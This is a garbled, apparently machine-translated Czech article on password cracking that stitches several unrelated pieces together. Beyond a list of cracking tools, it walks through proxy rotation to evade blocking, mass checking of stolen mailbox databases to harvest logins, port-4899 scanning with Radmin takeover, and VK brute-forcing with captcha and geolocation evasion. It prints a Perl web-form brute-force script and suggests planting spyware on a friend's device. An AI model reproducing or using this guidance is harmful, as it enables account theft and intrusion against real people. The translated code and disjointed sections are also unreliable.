Obnovení hesla hrubou silou. Nejlepší nástroje pro testování per: hesla hrubou silou Automatické vyhledávání hesel

Nedávno jsme publikovali článek o síle hesla a heslech, která používá mnoho uživatelů. Většina lidí používá slabá hesla. Ale jak se můžete ujistit, že vaše heslo je silné? Prolomení hesel je nedílnou součástí testování digitální forenzní a informační bezpečnosti.

V tomto článku jsme sestavili nejlepší programy pro prolomení hesel, které mohou správci systému použít ke kontrole síly svých hesel. Všechny nástroje používají různé algoritmy a jsou použitelné v různých situacích. Pojďme se nejprve podívat na pár základních informací, které vám pomohou pochopit, čím se budeme zabývat.

V oblasti kybernetické bezpečnosti a kryptografie hraje prolomení hesel velmi důležitou roli. Je to proces obnovy hesla za účelem narušení nebo obnovení zabezpečení počítače nebo systému. Proč se tedy potřebujete učit programy pro prolomení hesel? Pro mírové účely můžete využít hackování hesel k obnovení zapomenutých hesel z online účtů a toto také pravidelně využívají správci systému k prevenci.

Ve většině případů se k prolomení hesel používá hrubá síla. Software generuje různé možnosti hesla a hlásí, pokud bylo nalezeno správné. V některých případech může osobní počítač produkovat miliony možností za sekundu. Program na prolomení hesla na PC zkontroluje všechny možnosti a najde skutečné heslo.

Doba potřebná k prolomení hesla je úměrná délce a složitosti tohoto hesla. Proto se doporučuje používat složitá hesla, která je těžké uhodnout nebo uhodnout. Také rychlost hrubé síly závisí na kryptografické funkci, která se používá ke generování hash hesel. Proto je lepší používat pro šifrování hesel Bcrypt než MD5 nebo SHA.

Zde jsou hlavní metody hádání hesla používané útočníky:

• Slovníkový útok- útok používá soubor, který obsahuje seznam slov. Program zkontroluje každé ze slov, aby našel výsledek;
• Bruteforce útok- nemusíte používat slovník, ale raději iterujte všechny kombinace daných znaků;
• Rainbow Table Attack- útok používá předem vypočítané hashe, takže je rychlejší.

Existují i ​​jiné metody prolomení hesel založené na sociálním inženýrství, ale my se dnes zaměříme pouze na útoky bez interakce uživatele. K ochraně proti takovým útokům je třeba používat pouze složitá hesla. Nyní se podíváme na nejlepší nástroje pro prolomení hesel v roce 2017. Tento seznam je zveřejněn pouze pro informační účely a v žádném případě vás nenabádáme k nabourávání osobních údajů jiných lidí.

Nejlepší programy pro prolomení hesel

1. Jan Rozparovač

John the Ripper je jedním z nejoblíbenějších nástrojů pro prolamování hesel, který je dostupný naprosto každému. Je to open source a je napsán v programovacím jazyce C. Zde jsou shromážděny různé metody pro hesla hrubou silou.

Program je schopen vyhledávat hesla pomocí uloženého hashe a podporuje různé hashovací algoritmy, včetně automatické detekce algoritmů. John the Ripper je součástí sady nástrojů pro testování zabezpečení Rapid7. Kromě Linuxu jsou podporovány Windows a MacOS.

2. Aircrack-ng

Aircrack-ng je sada programů pro hackování a odchytávání hesel z wifi sítí. Program je jedním z nejlepších, které hackeři používají. Zde najdete vše, co potřebujete k prolomení šifrování WEP a WPA, od zachycení hashe až po získání hotového hesla.

Šifrování WEP je obzvláště snadné prolomit k překonání ochrany, existují útoky PMS a PTW, pomocí kterých můžete tento protokol prolomit během několika minut, pokud je v síti dostatečný provoz. Pro jistotu tedy vždy používejte WPA2. Podporovány jsou také všechny tři platformy: Linux, Windows, MacOS.

3.RainbowCrack

Jak název napovídá, RainbowCrack používá duhové tabulky k prolomení hash hesel. Pomocí hotových tabulek tento nástroj výrazně zkracuje dobu hackování. Kromě toho existují nástroje GUI a příkazového řádku.

Po dokončení fáze předběžných výpočtů pracuje tento nástroj stokrát rychleji než při běžném vyhledávání. Tabulky nemusíte vytvářet sami; vývojáři je již vytvořili pro LM, NTLM, MD5 a SHA1. Vše je k dispozici zdarma.

Dalším důležitým bodem je akcelerace GPU. Použitím grafické karty můžete zkrátit dobu výpočtu hesla o několik řádů. Podporovány jsou platformy Windows a Linux.

4. THC Hydra

Na rozdíl od výše uvedených programů funguje Hydra jinak. Nepočítá hashe. Místo toho program provádí útoky hrubou silou na různé síťové protokoly. Podporovány jsou zde Astrisk, FTP, HTTP, MySQL, XMPP, Telnet, SHH a mnoho dalších. Hlavním účelem nástroje jsou útoky hrubou silou na formulář pro zadání hesla.

Tento nástroj pomáhá bezpečnostním výzkumníkům zjistit, jak snadné je získat přístup ke vzdálenému systému. Moduly mohou být přidány pro rozšíření funkčnosti jsou podporovány Linux, Windows, Solaris, FreeBSD a MacOS.

5. HashCat

Podle vývojářů se jedná o nejrychlejší nástroj pro hesla hrubou silou. Je distribuován jako svobodný software a podporuje následující algoritmy: md4, md5, LM, SHA, MySQL, Cisco PIX a Unix Crypt.

Existují verze nástroje pro hrubou sílu na CPU a také hackování založené na GPU - oclHashcat a cudaHashcat. Kromě standardního útoku Bruteforce jsou podporovány slovníkové útoky, hybridní útoky využívající většinu, tabulky, Prince a tak dále. Podporované platformy jsou Windows, Linux a MacOS.

6. páčidlo

Crowbar je oblíbený nástroj pro testování zabezpečení hesel. Jiné programy pro hrubou sílu používají uživatelská jména a hesla, ale páčidlo vám umožňuje používat klíče SSH hrubou silou.

Tento open source nástroj je navržen pro práci s protokoly, které jsou zřídka podporovány jinými programy. V současné době jsou podporovány VNC, OpenVPN, SSP, NLA. Program lze spustit na systémech Linux, Windows a MacOS.

7.coWPatty

Toto je implementace utility pro hrubé vynucení hesla WPA/WPA2 PSK na základě slovníku nebo duhových tabulek. Použití duhových tabulek výrazně urychluje provoz utility. Standard PSK se nyní používá velmi často. Jediná dobrá věc je, že je velmi obtížné uhodnout heslo, pokud bylo původně zvoleno správně.

Článek poskytuje seznam, který obsahuje nejlepší programy pro prolomení hesel, které fungují na různých typech operačních systémů. Popisuje mimo jiné takové programy jako Aircrack, John the Ripper a THC Hydra - všechny používají různé algoritmy a protokoly, které jsou teoreticky schopné prolomit hesla různé složitosti v Linuxu, WIndows a OS X. Popis je omezen na jednoduchý výpis na úvodní exkurzi . Seznam obsahuje pouze ty, které běží na platformách Windows a Linux.

Co musí neprofesionál (za kterého se autor článku považuje) vědět o procesu hackování? Než začnete s procedurou „obnovení toho, co bylo zapomenuto“ nebo získáním hesel ze zachycených paketů, je třeba porozumět některým věcem:

Otázka "Jak dlouho trvá prolomení hesla?" v této podobě ve vás vynikne amatér. Je to ekvivalentní otázce, jak dlouho bude trvat cesta z Moskvy do Vladivostoku? Pěšky? Letadlem? Přes Čínu? I když existuje odpověď: od 1 sekundy do 100 000 let. Pokud vezmeme dešifrování prostřednictvím „podání ruky“, funguje to aircrack-ng dal mi kombinaci jen jednou:

• po týdnu práce...
• na dvoujádrovém notebooku s vestavěným GPU a 4 GB RAM...
• navzdory skutečnosti, že heslo obsahovalo POUZE 8 digitálních znaků

John Rozparovač, spuštěný na stejném stroji, selhal za 5 dní. Starý muž desktop s 4 - Na bázi Intel 2,8 jádra GHz na desce, 6 GB RAM a Nvidia 660 Ti Přišel jsem na podání ruky pro..., obecně jsem ani neměl čas vstát od stolu, když jsem viděl heslo. Můžete pracovat rychleji a s mnohem většími objemy, ale rozdávejte více než polovinu svého příjmuGTX 980 vůbec mě to netrápí...

A důvodem pro to nejsou programy. Což znamená mít po ruce slabá montáž hardwaru, Nepočítejte s vážnými výsledky.

Hackování hesel. Jaké metody existují?

Existuje několik způsobů, jak se dostat k cíli. Mezi nimi:

• slovníkový útok (hacker použije speciální soubor s připraveným seznamem kombinací znaků, které program vybere)
• Útok hrubou silou (kombinace hesel jsou generovány programem)
• útok na rainbow table (prolomení hashů platných hesel zadaných uživatelem)

Zde prezentované programy využívají různé možnosti útoku a jsou seřazeny v libovolném pořadí zvoleném autorem. Popisy práce s programy se objeví v příslušných odkazech v příslušných odstavcích.

Software pro prolomení hesel: John the Ripper

John Rozparovač– možná nejoblíbenější svého druhu. Převládajícím programovacím jazykem je C. Program je zdarma (ve zkrácené verzi) a zahrnuje několik přístupů k procesu hackování. Schopnost automaticky detekovat typy hash hesel ji staví do popředí etických hackerských nástrojů. Stejně jako ostatní hackerské nástroje Metasploit, patří do rodiny bezpečnostních nástrojů Raspid7.

Podporované platformy: Linux, Windows, Android, DOS a OS X

Software pro prolomení hesel: OphCrack

Program je nejčastěji používán mezi těmi, kteří rádi prolomí hesla k účtům Windows. Stejně jako RainbowCrack, OphCrack pracuje s duhovými tabulkami a získává cenné kombinace z hash hesel. Právě díky možnosti získávat hesla v různých formátech z různých systémových zdrojů je OphCrack známý svou schopností prolomit heslo Windows během okamžiku. Při fyzickém přístupu k počítači oběti ve formě Live DVD nezanechává žádné stopy. Dodává se ve dvou verzích, rozšířené a bezplatné (možnosti duhových tabulek Windows jsou omezeny).

Z webu výrobce

Hackerské programy hesla: L0phtCrack

Stejně jako předchozí je i L0phtCrack známý svou schopností rychle prolomit hesla Windows. Využívá širokou škálu útoků (hybridní, slovníkové, brute force, rainbow tables), ale dá se použít i pro síťové sniffování. V podstatě analogie předchozího programu. V tuto chvíli existuje pouze 15denní zkušební verze.

Podporované platformy: Windows

Stáhněte si L0phtCrack z webu výrobce

Brute force (odvozeno z anglické fráze: brute force) je typ hackerského útoku – metoda hackování účtů v počítačových systémech, platebních/bankovních službách a webových stránkách prostřednictvím automatizovaného výběru kombinací hesel a přihlašovacích údajů.

Hrubá síla je založena na stejnojmenné matematické metodě (brute force), ve které se správné řešení - konečné číslo nebo symbolická kombinace - najde hledáním v různých možnostech. Ve skutečnosti je každá hodnota z daného souboru potenciálních odpovědí (řešení) kontrolována na správnost.

Jak funguje hrubá síla

Hacker napíše speciální program na hádání hesel nebo použije hotové řešení od svých kolegů. Může být zacílen na konkrétní e-mailovou službu, webovou stránku, sociální síť (tj. je určen k hacknutí konkrétního zdroje). Dále se provádějí přípravy na hackování. Skládá se z následujících fází:

1. Příprava seznamu proxy

Aby bylo možné skrýt skutečnou IP adresu počítače, ze kterého bude útok proveden, a zabránit zablokování ze stránky, kde je nutné hacknout účet, je prostřednictvím proxy serveru nakonfigurováno připojení k internetu.

Hledání proxy adres/portů se provádí v Proxy Grabber. Tento nástroj nezávisle načítá všechna data pro připojení k zprostředkujícím serverům ze stránek, které poskytují proxy (jsou uvedeny v seznamu). Jinými slovy, shromažďuje se proxy.

Výsledná databáze je uložena v samostatném textovém souboru. A pak jsou všechny adresy serverů v něm obsažené zkontrolovány na funkčnost v kontrole proxy. Poměrně často programy určené pro automatizovanou těžbu proxy kombinují funkce grabberu i checkeru.

V důsledku toho získáte hotový seznam proxy ve formě seznamu IP/port, uložený v souboru txt. (Budete jej potřebovat při nastavování programu hrubou silou).

1. Hledejte základny pro Brute

K hrubé síle potřebujete připojit slovník – určitou sadu kombinací hesel a přihlašovacích údajů – kterou nahradí v přihlašovacím formuláři. Stejně jako seznam proxy má podobu seznamu v běžném textovém souboru (.txt). Slovníky, známé také jako databáze, jsou distribuovány prostřednictvím fór hackerů, webových stránek a služeb hostování souborů. Zkušenější „řemeslníci“ si je vytvářejí sami a poskytnou je všem za poplatek. Čím větší základ (počet kombinací, přihlášení, účty), tím lépe (pro hackera) - tím větší je pravděpodobnost úspěchu hackování.

1. Nastavení hrubé síly

Načte se seznam proxy; výběrový program automaticky změní proxy tak, aby webový server nedetekoval útok a podle toho zdroj (hostitel) útoku.

Je připojen slovník kombinací hesla/přihlášení. Počet vláken je nastaven - kolik kombinací hrubá síla současně zkontroluje. Výkonný počítač s vysokou rychlostí internetu zvládne s jistotou 120-200 streamů (to je optimální hodnota). Rychlost brute přímo závisí na tomto nastavení. Pokud například nastavíte pouze 10 vláken, výběr bude velmi pomalý.

1. Běžící hrubá síla

Program zaznamenává úspěšné pokusy o hackování: ukládá propojené účty (heslo/přihlašovací jméno) do souboru. Délka výběrového řízení se pohybuje od několika hodin do několika dnů. Ne vždy je však efektivní kvůli vysoké kryptografické síle přihlašovacích údajů nebo implementaci jiných ochranných opatření útočníkem.

Druhy hrubé síly

Osobní hackování

Lov na konkrétní účet - na sociální síti, na e-mailové službě atd. Prostřednictvím virtuální komunikace nebo v jejím průběhu útočník získá z oběti přihlašovací jméno pro přístup na webovou stránku. Poté prolomí heslo metodami hrubé síly: hrubou silou uvede adresu webového zdroje a získané přihlašovací jméno a připojí slovník.

Šance na takový hack je malá, například ve srovnání se stejným XSS útokem. Může být úspěšný, pokud majitel účtu použije heslo o délce 6-7 znaků s jednoduchou kombinací symbolů. Jinak bude „řešení“ stabilnějších variant 12, 15, 20 písmen, čísel a speciálních znaků trvat roky – desítky a stovky let, na základě výpočtů matematického vyhledávacího vzorce.

Brut/kontrola

Databáze s přihlašovacími údaji/hesly z poštovních schránek jedné poštovní služby (například mail.ru) nebo různých je spojena s hrubou silou. A proxy seznam - pro maskování uzlu (protože e-mailové webové služby rychle detekují útok na základě více požadavků z jedné IP adresy).

Možnosti surovce označují seznam klíčových slov (obvykle názvy stránek) - orientační body, podle kterých bude hledat přihlašovací údaje na hacknutých schránkách (například: steampowered, worldoftanks, 4game, VK). Nebo konkrétní internetový zdroj.

Při registraci do online hry, sociální sítě nebo fóra uživatel podle očekávání uvede svůj e-mail (schránku). Webová služba odešle na zadanou adresu zprávu s přihlašovacími údaji a odkazem pro potvrzení registrace. Právě tato písmena hledá hrubá síla, aby z nich vydolovala přihlašovací jména a hesla.

Klikněte na „START“ a program cracking začne hrubou silou. Pracuje podle následujícího algoritmu:

1. Načte přihlašovací jméno/heslo pro e-mail z databáze.
2. Zkontroluje přístup nebo „zkontroluje“ (automaticky se přihlásí): pokud je možné se k účtu přihlásit, přidá jeden do sloupce dobrý (to znamená, že byl nalezen další pracovní e-mail) a začne jej prohlížet (viz následující body ); pokud není přístup, je uveden jako špatný.
3. Ve všech „pípnutích“ (otevřených e-mailech) hrubá síla skenuje dopisy podle požadavku zadaného hackerem – to znamená, že hledá přihlašovací jména/hesla k zadaným stránkám a platebním systémům.
4. Když jsou požadovaná data nalezena, zkopíruje je a zapíše do samostatného souboru.

Dochází tak k masivnímu „ukradení“ účtů – z desítek na stovky. Útočník se získanými „trofejemi“ nakládá podle vlastního uvážení – prodej, výměna, sběr dat, krádež peněz.

Vzdálené hackování počítače

Hrubá síla se ve spojení s dalšími hackerskými nástroji používá k získání vzdáleného přístupu k heslem chráněnému PC oběti prostřednictvím internetového kanálu.

Tento typ útoku se skládá z následujících fází:

1. Provádí se vyhledávání IP sítí, ve kterých bude proveden útok na počítače uživatelů. Rozsahy adres se přebírají ze speciálních databází nebo prostřednictvím speciálních programů, jako je IP Geo. V něm můžete vybrat IP sítě pro konkrétní okres, region a dokonce i město.
2. Vybrané rozsahy IP a výběrové slovníky se nastavují v nastavení hrubé síly Lamescan (nebo jeho analogu), určeného pro vzdálené přihlášení/heslo hrubou silou. Po spuštění Lamescan dělá následující:

• vytvoří připojení ke každé IP z daného rozsahu;
• po navázání spojení se pokusí připojit k hostiteli (PC) přes port 4899 (ale mohou existovat i jiné možnosti);
• pokud je port otevřený: pokusí se získat přístup do systému, po výzvě k zadání hesla provede hádání; v případě úspěchu uloží IP adresu hostitele (počítače) a přihlašovací údaje do své databáze.

1. Hacker spustí nástroj Radmin určený ke správě vzdálených počítačů. Nastaví síťové souřadnice oběti (IP, přihlašovací jméno a heslo) a získá plnou kontrolu nad systémem - pracovní plochou (vizuálně zobrazenou na displeji útočníkova počítače), adresáři souborů, nastavením.

Programy pro Brutus

HASHCAT

Pro rok 2020 jeden z nejvýkonnějších programů pro brute. Používá více než 200 algoritmů hrubé síly. Široce se používá pro hádání hesel WPA/WPA2, stejně jako hesel pro dokumenty MS Office, PDF, 7-Zip, RAR, TrueCrypt.

Klasická hrubá síla, jedna z prvních. Neztrácí však na aktuálnosti a konkuruje novým řešením. Má rychlý algoritmus hrubé síly a podporuje všechny hlavní internetové protokoly - TCP/IP, POP3, HTTP atd. Dokáže falšovat soubory cookie. Brute slovník a generuje hesla nezávisle.

Výkonný brute checker. Vybaveno rozšířeným arzenálem funkcí pro práci s databázemi (kontrola, řazení podle domény). Podporuje různé typy proxy a kontroluje jejich funkčnost. Skenuje dopisy v poštovních schránkách na základě nastavení, jako je datum, klíčové slovo, adresa, nepřečtené zprávy. Může stahovat dopisy z Mail.ru a Yandex.

Brute force - brute force, brute force hacking
V článku "" bylo řečeno, že hackování VK pomocí hrubé síly (programu) je nemožné.
Není to tak úplně pravda, pořád jsou tu mezery...
Níže je funkční skript, ale nejprve...

V dolní části článku je bezplatný program pro generování brutálního slovníku a výpis „nejlepších hesel“

Předem si rezervuji, že mluvíme o klasické „hrubé síle“ bez jakýchkoliv algoritmů PBKDF2, bez parsování sha hash, protože na každodenní úrovni je to ohromující úkol.

Na internetu koluje mnoho programů „pro hackování VK pomocí hrubé síly (brute force)“

Kterou si vybrat? Který z nich pomůže (aniž by mi ublížil)?
- Žádný

Každý účet VK vyžaduje osobní přístup a šablonové programy ze sítě jsou samé kraviny, podvody, kecy.

Nyní pochopíte proč. Matematická část krátce.

Minimální délka hesla VK je 6 znaků.

Heslo musí obsahovat:
čísla(0-9-10 možností),
písmena(a–z – 26 v latině),
velká písmena(A-Z - také 26)

Celkem pro každý symbol - 10+26+26=62 (!) možností, takže počet kombinací pro:
6znakové heslo – 56 800 235 584 (56,8 miliardy)
7znakové heslo – 3 521 614 606 208 (3,5 bilionu)
8znakové heslo – 218 340 105 584 896 (218 bilionů)
9místné heslo -13 537 086 546 263 600 (HZ jak se jmenuje))))

Neznáme délku hesla, takže budeme muset hrubou silou použít rozsah alespoň 6-8 znaků
Celkem: 6+7+8 znaků = 221 918 520 426 688 (222 bilionů) možností

Řekněme, že máte docela dobrý počítač, ale vyvstává otázka - kolik požadavků na server VK může provést?
Jaká je rychlost vyhledávání u domácího počítače?

Pojďme si to spočítat. Chcete-li to provést, otevřete příkazový řádek (Start - standardní - Příkazový řádek nebo spusťte proces cmd.exe)
Zadejte příkaz a získejte odpověď serveru

“Odpověď od .....čas 134 ms” (toto je pro mě, váš čas se může lišit)

Doba pingu je doba, za kterou signál přejde z našeho stroje na server a zpět

V jedné sekundě je 1000 milisekund (ms).
Hrubá rychlost vašeho stroje (požadavky/s) bude = 1000/doba odezvy
V mém případě 1000/134 ms = 7,4 požadavků (hesel) za sekundu

Jak dlouho bude trvat hledání hesel pro VK?

Dovolte mi připomenout, že zkoušíme 221 918 520 426 688 (222 bilionů) možností hesla.

Abychom tedy zjistili, jak moc prolomíme heslo VK hrubou silou, vydělíme částku rychlostí, tzn.

221918520426688 hesel / 7,4 hesla za sekundu = 29737081737176s = 495618028953 min = 8260300483 hodin = 344179187 dní = 942957 let

Závěr:skutečný program pro hackování VK mohl najít heslo hrubou silou za 94 tisíc let.

Otázka: A co videa na YouTube, ve kterých zázračné programy brutálně vynutí stránku VK za pár minut/hodin?
Odpovídám: Toto je podvod vytvořený s cílem infikovat váš počítač a ukrást vaše vlastní data. Nic víc, nic míň.

Můžete výrazně urychlit proces hledání!
K tomu potřebujete:
1. Zvyšte výpočetní výkon. Například infikujte 1 000 000 počítačů jiných lidí a současně hrubá síla VK ze všech z nich (to je legrační)
2. Zkraťte slovník Brute např. na pár tisíc (na principu sociálního inženýrství)

Jak vytvořit Brute slovník?
1. Použití per v programu Poznámkový blok (notepad.exe)
2. Prog „brutus generator“ (odkaz ve spodní části článku)

Naplňujeme tento brutální slovník skutečnými možnostmi.

Skutečné jsou ty, které jsou alespoň nějak spojeny s osobou, která je hackována:

-telefony(on, jeho příbuzní, přátelé)
Příklad- čísla s +7c, 8c, bez 8c - málo vídaná

- data narození(on, jeho příbuzní, blízcí)
Příklad- (stejné datum) 010118, 01012018, 20180101, 180101 - setkává se často

- Jména blízkých
Příklad- SashaMaria, MariaIvanova, SaNoMaIv - přijde průměr

Název webu (nebo příjmení) v jiném rozvržení
Příklad, pokud na ruské klávesnici zadáte slovo „vkontakte“, dostanete „mlshtefleu“ - takové schéma se velmi často vyskytuje na všech stránkách.

- Lokhov seznam hesel pro Bruta(seznam nejběžnějších hesel na internetu - odkaz na konci článku)

Jak dlouho trvá napsat slovník? No vlastně ne - půl hodiny stačí. Kdo řekl, že to bude snadné?))

Řekněme, že máme vytvořený brutální slovník a funkční program pro výběr hesla VK (nebo jeho ruční zadání pomocí slovníku).

Vyvstává jeden důležitý problém - bezpečnostní systém serveru.

Ve skutečnosti je jeho překážka v tom, že pokud jsou požadavky příliš časté, server hloupě (dočasně) blokuje vaši IP. Pokud navíc pracujete s VK přes standardní vstupní formulář (HTML\FORM), tak po 3. neúspěšném pokusu vás VK vyzve k zadání captcha.

Ve staré verzi VK jste mohli jednoduše přejít na mobilní verzi - m.vk.com, ale nyní neexistuje žádná mobilní verze jako taková - v roce 2016 vytvořili jediný adaptivní design.

Jak obejít VKontakte captcha?

VK vyžaduje zadání captcha po 3 neúspěšných pokusech (restartování F5 nepomůže), ale jak to ví to jsi ty Pokoušíte se přihlásit vícekrát?

Podle IP
- pomocí souborů cookie, mezipaměti a JavaScriptu

S cookies, cache a JavaScriptem nejsou žádné problémy – můžete je jednoduše zakázat v nastavení vašeho prohlížeče.

IP lze změnit instalací programu na změnu IP - není na tom nic složitého, na internetu je jich dost (může pomoci Google)

Můžete použít prohlížeč TOR (pro ty, kteří nevědí, je to prohlížeč pro anonymní surfování po síti, také mění čísla IP s každou novou relací, což je užitečná věc zejména pro ty, kteří surfují nebo pracují v SAR)

Ale všechny pokusy o hrubou sílu jsou GEOLOKACE téměř zcela anulovány.

Server VK si pamatuje, kde (geograficky) bylo provedeno poslední přihlášení.

A pokud je vaše IP z jiné lokality, pak (možná) vyskočí následující zpráva:

"Pokoušíte se přihlásit pod jménem Ivan Ivanov z neobvyklého místa."

Chcete-li potvrdit, že jste skutečně vlastníkem stránky, uveďte prosím všechny chybějící číslice telefonního čísla, se kterým je stránka propojena.

Skript pro hrubé webové formuláře (jako je program pro hackování VK)

Důležité! Na serveru VK je skript, který hlídá frekvenci odesílání paketů, tzn. pokud zatlučete rychlostí N krát/s, budete automaticky posláni na seznam zákazů IP.
VK také používá GEO sledování.

Bez dynamické IP byste se neměli pokoušet brutálně, VPN může pomoci.
Osobně považuji brutální vynucování hesel VK za neperspektivní, ale pro fajnšmekry zveřejním starý skript Perl vypůjčený z 5p4x2knet a.k.a. Apokalyptické a trochu opravené.

Skript pracuje metodou POST pouze ve dvou parametrech - přihlásit se A Heslo.

Pokud znáte přihlašovací údaje (například telefonní číslo), jednoduše vyplňte odpovídající pole hodnotou bez odkazu na slovník.

Skrytá pole - captcha, skript nebude přenášet obrázky, skryje zdroj požadavků (sebe), jak je popsáno výše.

Zde budeme potřebovat zdravý slovník Brute, který jsme sestavili na začátku článku. (říkejme tomu např. brutal.txt )

Potřebujeme také soubor, ze kterého bude náš program přijímat informace.

Program hrubě vynutí všechny skripty uvedené v tomto souboru.( info.txt). Pokud existuje pouze jeden skript, můžete jej nahradit

Samozřejmě, že soubor pro záznam výsledků ( result.txt)

Tak,
{
#připojit objekt
$usagent = LWP::UserAgent
#otevřít soubor s informacemi (pokud jej nemůžeme otevřít, ukončete);
# vypište soubor do pole @infa a zavřete jej. (pokud existuje pouze jeden skript, můžete jej okamžitě zadat)
open(INFA, ";
zavřít(INFA);
#otevřete slovník Brute
open(BRUT, ";
zavřít(BRUT);
#otevření souboru s výsledky (připojuje se na konec).
open(RESULT, ">>$ARGV");
#začátek cyklu
foreach $name (@infa)
{
#separate URL, přihlašovací údaje, proměnné a informace o chybách
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#zobrazit adresu URL
tisk "$url...n";
#začněte další cyklus
foreach $brut (@brut)
{
#zabít mezery a zalomení řádků
$pss =~ s/ //;
$pss =~ s/n//;
#připojit nový objekt
$usagent = LWP::UserAgent->new();
#vytváření požadavků.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");
#a jeho odeslání
$vysledek = $usagent -> request($req);
#uložení výsledků do proměnné
$res = $vysledek->obsah;
#pokud to nefunguje, vygeneruje se chybová zpráva
if($res!~ /$failed/i)
{
#output zpráva s heslem; záznam ve výsledcích;
print "brutword found. It is$pssnn";
vytisknout VÝSLEDEK "URL: $urlnLOGIN: $loginnBRUT: $pssnn";
#jinak pokračujte ve výběru
poslední;
}
}
}
#zavírání souboru result.txt
zavřít(VÝSLEDEK);

Běžný jev na internetu. Provádí se pro různé účely. Nejčastějším cílem je rozesílání spamu a rušivé reklamy. Někdy hackeři kradou peníze z účtů na sociálních sítích. Hackování platebních systémů je nebezpečné. Hacknutí e-mailového hesla s sebou kromě rozesílání spamu nese nebezpečí, že lze zjistit i všechna ostatní data účtu. Někdy se provádí za účelem krádeže herního obsahu.

K ochraně dat používejte silná hesla

Metody prolomení hesla

I ta nejlepší e-mailová hesla mohou být hacknuta. Způsoby, kterými hackeři fungují, se každým dnem zlepšují. Jedná se o speciální programy pro výběr kombinací, metody pro sledování akcí na internetu atd.

Phishing

Tento způsob, jak zjistit heslo z VK nebo jiné sociální sítě, je mezi hackery oblíbený. Uživateli je zaslána zpráva s výzvou, aby přešel na stránku, která vypadá podobně jako ta, kterou se hacker pokouší hacknout. Obvykle je z něj zcela zkopírován.

Po kliknutí na odkaz uživatel zadá další údaje v domnění, že se snaží přihlásit ke svému obvyklému účtu. Na takový web se můžete dostat a pokusit se zjistit heslo s přihlášením, to znamená pomocí funkce „Obnovení účtu“.

Uživatel klikne na tlačítko „Přihlásit se“ a data se okamžitě dostanou k útočníkům. Samotný uživatel je přesměrován na stránku skutečné sociální sítě, aniž by si všiml, co se stalo. Pokročilé sociální inženýrství umožňuje hackerům zjistit heslo kontaktu jiné osoby.

Koneckonců, aby uživatel klikl na falešný odkaz, je nutné si jeho důvěru „zasloužit“. Metoda není příliš účinná, ale snadno proveditelná. Majitel účtu však může mít podezření, že ten skutečný se často příliš neliší) a odmítnout přejít. Útočníka lze snadno najít.

Při zadávání hesla věnujte pozornost adrese webu: útočníci často způsobí, že adresa falešného webu bude vypadat podobně jako původní web

Výběr

Hlavní technologií, kterou hackeři používají ke snaze zjistit heslo k emailu hrubou silou, je BruteForce. Jedná se o metodu automatického generování a nahrazování kombinací pro účet. Pro spuštění takového výběru potřebujete speciální program, jehož prolomení hesla bude rychlé. Tento program funguje na matematickém principu, kdy správné řešení je určeno výběrem.

Program tak donekonečna generuje kombinace čísel a písmen a kontroluje jejich správnost. Vzhledem k jejich vysokému výkonu fungují takové programy poměrně rychle.

Hackerská služba pro hackování může být buď univerzální, nebo pro konkrétní web. Když to funguje, vytvoří se falešný proxy, díky kterému mohou útočníci skrýt svou IP. Pravidelnou výměnou se navíc lze vyhnout zablokování počítače, ze kterého se hackování provádí. Po jeho napadení, když se přihlásíte ke svému účtu, uvidíte zprávu, že vaše heslo bylo prozrazeno. Naléhavě je třeba provést následující:

1. Změnit podrobnosti účtu;
2. Změnit bezpečnostní otázku;
3. Napište správě, že heslo v Kontaktu (nebo na jiném zdroji) bylo prozrazeno.

Přestože se používaly dřívější programy, které fungovaly podle , nyní se objevily pokročilejší. Nahrazení čísel do slova váš účet nezajistí. Nové programy vybírají zcela libovolné alfanumerické kombinace, lze je použít k rozluštění velmi složité kombinace symbolů.

Hacknutí hesla sociální sítě VKontakte hrubou silou

Hashe a hackování webových stránek

Efektivní, ale komplexní metoda hackování. Aby hackeři zjistili heslo, nabourají webovou stránku, která uchovává hashe kombinací uživatelských kódů. Hash se získá poté, co kombinace písmen prošla nevratně složitým postupem. Když při přihlašování do účtu zadáte kombinaci znaků, hash se vypočítá znovu a pokud se shoduje s uloženým, pak jste kódové slovo zadali správně. Tato data jsou odcizena útočníky, kteří hacknou stránky. To je ještě jednodušší u starých zdrojů, které neukládají hashe, ale samotné kombinace písmen.

Hash není tak těžké dešifrovat. Hackeři mají mnoho programů a služeb, které jim umožňují je rozpoznat a používat. Po hacknutí samotné služby uvidí heslo v Yandex Mail takto:

• Výpočet hashovacích algoritmů a dešifrování dat;
• Díky databázi kombinací kódů BruteForce má hacker také hashe těchto slov, zakódované jedním nebo druhým algoritmem. Program umí pouze porovnávat stávající s novými;
• Algoritmů není mnoho a jsou běžné.

Hašování na webových stránkách je proces podobný tomu, jak fungují soubory cookie na počítači. Dešifrování je stejně snadné jako zjištění hesla z cookies. Je tedy zřejmé, že takové úložiště není spolehlivou ochranou účtu ani při velmi složité kombinaci.

Hacknutí hesla uhodnutím ze slovníku

Spyware

Spyware je software nainstalovaný na počítači, který je skrytý. Aby uživatel o jeho existenci nevěděl. V podstatě je to virus. Navrženo tak, aby shromažďovalo informace o uživateli, přihlášení, historii požadavků prohlížeče, kódová slova atd. Nezbytné pro hackování a pro provádění cílené reklamy. Pomocí takových programů se informace přenášejí přímo k útočníkovi.

Takové programy se maskují jako software, který nabízí zkopírování hesla ve formě hvězdiček nebo jeho obnovení z cookies. Takové programy je třeba používat opatrně. Pro obnovení možnosti přihlášení k účtu je lepší použít prohlížeč. Pomocí spywaru můžete zjistit heslo svého přítele instalací malwaru do jeho telefonu nebo počítače. V takovém případě vám budou data přenesena.

Špionážní program heslo neprolomí, jednoduše ho ukradne a pošle útočníkovi

Bylo vaše heslo hacknuto?

Některé zdroje samy zobrazují oznámení o hackování. Sociální síť VKontakte vydá při přihlašování k vašemu účtu upozornění, že heslo bylo prozrazeno. Pokud změníte kódové slovo na staré, může se takové upozornění objevit, protože web ukládá černou listinu hesel, ze kterých byl odeslán spam atd.

Okno s upozorněním uživatele, že jeho účet byl hacknut

Kromě toho existuje řada online služeb, které obsahují účty, které se nedávno dostaly do rukou zločinců. Pokud existují důvody se domnívat, že se pokusili hacknout vaše e-mailové heslo, zadejte do pole svou e-mailovou adresu (nebo přihlašovací jméno, pokud nemluvíme o poštovních schránkách) a uvidíte, zda byl váš účet hacknut.

Můžete zjistit, zda byl váš účet napaden jiným způsobem. Tím hlavním je analýza aktivity na vašem účtu během vaší nepřítomnosti na webu.

PODÍVEJTE SE NA VIDEO

